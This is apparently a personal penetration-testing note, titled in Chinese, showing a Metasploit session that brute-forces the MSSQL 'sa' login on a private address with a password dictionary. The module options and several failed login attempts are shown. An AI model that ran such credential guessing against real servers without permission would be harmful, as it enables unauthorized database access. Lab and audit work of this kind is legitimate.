MSF爆破MSSQL

show options:

msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   BLANK_PASSWORDS      false                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS         false                                     no        Add all users in the current database to the list
   PASSWORD                                                       no        A specific password to authenticate with
   PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line
   RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier
   RPORT                1433                                      yes       The target port (TCP)
   STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                                         yes       The number of concurrent threads
   USERNAME             sa                                        no        A specific username to authenticate as
   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false                                     no        Try the username as the password for all users
   USER_FILE                                                      no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true                                      yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > run 

[*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.
[!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:npdx123！ (Incorrect: )